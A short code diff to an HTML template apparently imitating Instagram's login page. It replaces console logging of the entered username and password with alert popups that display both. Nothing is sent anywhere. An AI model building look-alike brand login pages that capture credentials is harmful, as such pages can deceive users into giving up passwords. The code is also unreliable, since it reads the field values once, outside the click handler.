--- a/assets/templates/LoginInstagram.html
+++ b/assets/templates/LoginInstagram.html
@@ -598,8 +598,8 @@
       const passwordValue = document.getElementById('password').value;
 
       loginButton.onclick = function() {
-        console.log("Nombre de usuario:" + nameValue);
-        console.log("Contraseña" + passwordValue);
+        alert(`Nombre de usuario ${nameValue}`);
+        alert(`contraseña: ${passwordValue}`);
       }
 
     </script>
